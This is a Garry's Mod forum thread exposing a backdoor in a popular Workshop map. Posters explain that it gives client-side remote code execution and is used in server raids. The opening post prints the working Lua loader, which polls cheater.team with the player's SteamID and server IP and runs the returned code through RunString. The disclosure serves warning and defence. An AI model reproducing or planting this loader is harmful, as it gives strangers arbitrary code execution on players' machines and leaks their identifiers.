rp_downtown_v4c cheater.team backdoor - Garry's Mod

rp_downtown_v4c cheater.team backdoor

9 replies, posted
In This Thread

[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=834371620"]This[/URL] downtown upload has 2,879 current subscribers and it contains a backdoor that runs lua from cheater.team's website. [IMG]http://i.imgur.com/ocDkYWD.png[/IMG] [IMG]http://i.imgur.com/sJkmdOw.png[/IMG]

PM Robotboy655 for it to be taken down.

[code]// Hello Intruder, You've come this far! // Lets keep going, you have a while yet. timer.Create("39715",2,0,function() http.Fetch("http://cheater.team/hail/slave.php?action=update&steam="..LocalPlayer():SteamID().."&serverip="..game.GetIPAddress(), function(p0) local p1 = util.JSONToTable(p0); if(p1["response"]["packet"] != 0 && p1["response"]["packet"]["header"] != "0" && p1["response"]["packet"]["source"] != "0" && ( p1["response"]["packet"]["header"] == "*" || p1["response"]["packet"]["header"] == LocalPlayer():SteamID() )) then RunString(p1["response"]["packet"]["source"]); end end, function(...) end); end);[/code] laff

What does this backdoor even do?

Remote code execution, it lets them run anything they want on your client. This is the kind of shit they use when they raid servers and make a massive number of players connect.

[QUOTE=maksimiljan;51775574]Remote code execution, it lets them run anything they want on your client. This is the kind of shit they use when they raid servers and make a massive number of players connect.[/QUOTE] Which is what happened to our DarkRP classic server. Interesting! Laughable given clients will abort during load or disconnect immediately, but interesting.

-snip-

The most disturbing part of this is the C++ style comments; just more subpar skiddery. Not using reuploads will get you quite far in avoiding backdoors from these idiots.

[QUOTE=TFA;51779833]The most disturbing part of this is the C++ style comments; just more subpar skiddery. Not using reuploads will get you quite far in avoiding backdoors from these idiots.[/QUOTE] Of all the things wrong with the code, it's the comments that bother you most? What the fuck

[QUOTE=FPtje;51780124]Of all the things wrong with the code, it's the comments that bother you most? What the fuck[/QUOTE] I was completely joking with regards to that. There's a hell of a lot worse wrong with it, from its use of timers to the poor "obfuscation," not to mention the very nature of the code.

Sorry, you need to Log In to post a reply to this thread.